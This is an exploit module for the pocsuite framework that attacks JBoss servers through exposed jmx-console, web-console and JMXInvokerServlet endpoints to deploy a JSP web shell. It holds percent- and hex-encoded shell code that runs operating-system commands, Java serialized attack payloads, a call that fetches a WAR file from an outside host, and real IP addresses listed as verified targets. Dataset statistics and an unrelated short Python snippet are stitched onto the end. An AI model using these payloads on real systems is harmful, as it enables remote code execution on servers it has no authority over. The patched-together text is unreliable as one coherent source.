"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
class JbossPOC(POCBase):
# PoC metadata consumed by the pocsuite framework (original comments
# translated from Chinese).
vulID = '13' # ssvid ID; use 0 if the PoC is submitted together with the vulnerability
version = '1' # defaults to 1
vulDate = '2017-06-29' # date the vulnerability was disclosed (today if unknown)
author = 'i@cdxy.me' # PoC author
createDate = '2017-06-29'# date the PoC was written
updateDate = '2017-06-29'# date the PoC was last updated; defaults to createDate
references = 'https://github.com/Xyntax/POC-T'# source of the vulnerability; leave empty for 0day
name = 'JBoss serialization getshell'# PoC name
appPowerLink = 'http://www.jboss.org/'# vendor homepage
appName = 'JBoss'# affected application name
appVersion = 'www.seebug.org/vuldb/ssvid-89723'# affected versions
vulType = 'code-exec'# vulnerability type, see the vulnerability-type reference table
desc = '''
Jboss 反序列化漏洞
''' # brief description (Chinese: "JBoss deserialization vulnerability")
samples = ["1.197.56.123:8087","50.200.187.230:8087",]# sites the PoC was verified against
install_requires = [] # third-party module dependencies; avoid where possible
cvss = u"严重" # severity (Chinese: "critical"); one of critical/high/medium/low
def get_successfully(self, url, path):
    """
    Test if a GET to a URL is successful.

    :param url: The base URL
    :param path: The URL path
    :return: The HTTP status code
    """
    # Give the freshly deployed WAR some time to become available.
    sleep(5)
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
        "User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
    response = pool.request(
        'GET', url + path, redirect=False, headers=headers, timeout=3)
    status = response.status
    if status == 404:
        # Deployment may not have finished yet: wait longer and retry once.
        sleep(7)
        response = pool.request(
            'GET', url + path, redirect=False, headers=headers, timeout=3)
        status = response.status
    return status
def exploit_jmx_console_main_deploy(self,url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://" + url
jsp = "http://www.joaomatosf.com/rnp/jexws.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0=" + jsp)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_console_file_repository(self,url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75"
"%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e"
"%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46"
"%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74"
"%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d"
"%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65"
"%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e"
"%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30"
"%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22"
"%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d"
"%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22"
"%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b"
"%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73"
"%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48"
"%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75"
"%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69"
"%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77"
"%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28"
"%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20"
"%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63"
"%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63"
"%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
"%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20"
"%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22"
"%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70"
"%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
"%74%53%74%72%65%61%6d%28%29%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73"
"%73%20%70%3b%20%69%66%20%28%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70"
"%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%2e%74%6f%4c%6f%77%65%72"
"%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%22%77%69%6e%22%29%20%3e"
"%20%30%29%7b%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e"
"%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%6d%64%2e%65%78%65%20%2f%63"
"%20%22%2b%73%68%29%3b%20%7d%20%65%6c%73%65%20%7b%70%20%3d%20%52%75%6e"
"%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28"
"%73%68%29%3b%7d%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%64%20"
"%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65"
"%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67"
"%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%53%74%72%69"
"%6e%67%20%64%69%73%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b"
"%20%77%68%69%6c%65%20%28%64%69%73%72%20%21%3d%20%6e%75%6c%6c%29%20%7b"
"%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73"
"%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6f%75%74%2e%70"
"%72%69%6e%74%6c%6e%28%22%55%6e%6b%6e%6f%77%6e%20%63%6f%6d%6d%61%6e%64"
"%2e%22%29%3b%7d%7d%25%3e")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws.war&argType=java.lang.String&arg1=jexws&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_invoker_file_repository(self,url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x05\xaa\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0a\x6a\x65\x78\x69\x6e\x76\x2e\x77\x61\x72"
"\x74\x00\x06\x6a\x65\x78\x69\x6e\x76\x74\x00\x04\x2e\x6a\x73\x70\x74\x04\x71"
"\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61"
"\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67\x65\x45"
"\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e\x3c\x70"
"\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74"
"\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d"
"\x20\x6e\x75\x6c\x6c\x29\x7b\x20\x55\x52\x4c\x20\x75\x72\x6c\x20\x3d\x20\x6e"
"\x65\x77\x20\x55\x52\x4c\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73"
"\x68\x65\x6c\x6c\x2e\x6a\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x22\x29"
"\x3b\x20\x48\x74\x74\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e"
"\x20\x63\x68\x65\x63\x6b\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c\x43\x6f"
"\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x75\x72\x6c\x2e\x6f\x70\x65\x6e\x43"
"\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x77\x72\x69\x74\x65\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x3d\x20"
"\x28\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e"
"\x67\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22"
"\x68\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28"
"\x22\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x5b\x5d\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x2e\x73\x70\x6c\x69"
"\x74\x28\x22\x20\x22\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72"
"\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73\x74\x22\x29\x2b\x22\x3c\x2d"
"\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x52\x65\x6d\x6f\x74\x65"
"\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20\x28\x21\x6e\x65\x77\x20\x46"
"\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70"
"\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29"
"\x29\x7b\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74"
"\x65\x72\x20\x3d\x20\x6e\x65\x77\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65"
"\x72\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70\x65\x72"
"\x6d\x69\x73\x73\x69\x6f\x6e\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x67\x65\x74"
"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x20\x77\x72\x69\x74"
"\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20"
"\x69\x66\x20\x28\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28"
"\x22\x69\x64\x22\x29\x20\x7c\x7c\x20\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74"
"\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x29\x29\x20\x63"
"\x68\x65\x63\x6b\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d"
"\x28\x29\x3b\x20\x74\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70"
"\x3b\x20\x69\x66\x20\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f"
"\x70\x65\x72\x74\x79\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f"
"\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66"
"\x28\x22\x77\x69\x6e\x22\x29\x20\x3e\x20\x30\x29\x7b\x20\x70\x20\x3d\x20\x52"
"\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x7a\x00"
"\x00\x01\xb2\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b"
"\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74"
"\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68\x29\x3b\x7d\x20\x42\x75"
"\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x64\x20\x3d\x20\x6e\x65"
"\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65"
"\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72"
"\x28\x70\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29"
"\x29\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64"
"\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20"
"\x28\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75"
"\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69"
"\x73\x72\x20\x3d\x20\x64\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20"
"\x7d\x20\x7d\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20"
"\x65\x29\x20\x7b\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e"
"\x6b\x6e\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x7d\x7d"
"\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f\x6f"
"\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05\x76"
"\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47"
"\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x0f"
"\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x69\x0e\x8b\x92"
"\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e"
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9"
"\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x04"
"\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexinv/jexinv.jsp")
def exploit_web_console_invoker(self,url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0e\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70\x70"
"\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x73"
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74"
"\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf"
"\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f"
"\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexws/jexws.jsp")
def auto_exploit(self,url, exploit_type):
result = 505
if exploit_type == "jmx-console":
result = self.exploit_jmx_console_file_repository(url)
if result != 200 and result != 500:
result = self.exploit_jmx_console_main_deploy(url)
elif exploit_type == "web-console":
result = self.exploit_web_console_invoker(url)
elif exploit_type == "JMXInvokerServlet":
result = self.exploit_jmx_invoker_file_repository(url, 0)
if result != 200 and result != 500:
result = self.exploit_jmx_invoker_file_repository(url, 1)
if result == 200 or result == 500:
return True
def poc(self,url):
"""
Test if a GET to a URL is successful
:param url: The URL to test
:return: A dict with the exploit type as the keys, and the HTTP status code as the value
"""
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console": "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
step1 = False
exploit_type = ''
for i in paths.keys():
try:
r = pool.request('HEAD', url + str(paths[i]), redirect=True, headers=headers, timeout=3)
paths[i] = r.status
if paths[i] == 200 or paths[i] == 500:
step1 = True
exploit_type = str(i)
else:
pass
except Exception:
paths[i] = 505
if step1:
step2 = False
try:
step2 = self.auto_exploit(url, exploit_type)
except Exception, e:
pass
return step2
else:
return False
#验证漏洞 pocsuite -r 13-JBoss-serialization-getshell.py -u 1.197.56.123:8087 --verify
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = "8087"
vul_host = _host + ":" + _port
#print vul_host
try:
vul_result = self.poc(vul_host)
except Exception, e:
vul_result = False
if vul_result:
#print u"发现漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_host + "https://github.com/joaomatosf/jexboss"
#print r_content
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(r_content,'html.parser')
#print soup.h1.string
print '[+]13 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
# https://github.com/joaomatosf/jexboss
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# Register the PoC class with the pocsuite framework so it can be discovered and run.
register(JbossPOC)
| 57.054622
| 145
| 0.597356
| 4,894
| 27,158
| 3.293421
| 0.124234
| 0.012284
| 0.010609
| 0.014146
| 0.576374
| 0.515759
| 0.488026
| 0.464946
| 0.442238
| 0.410473
| 0
| 0.290177
| 0.210214
| 27,158
| 475
| 146
| 57.174737
| 0.46128
| 0.022903
| 0
| 0.153425
| 0
| 0.512329
| 0.623978
| 0.531239
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.010959
| 0.054795
| null | null | 0.00274
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
863265fec69e3c88b700b8a9630a14290000cba9
| 75
|
py
|
Python
|
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
"""Print the public interface of Python's low- and high-level threading modules."""
import _thread
import threading

# Dump each module's attribute list, low-level module first.
for _module in (_thread, threading):
    print(dir(_module))
| 15
| 21
| 0.8
| 10
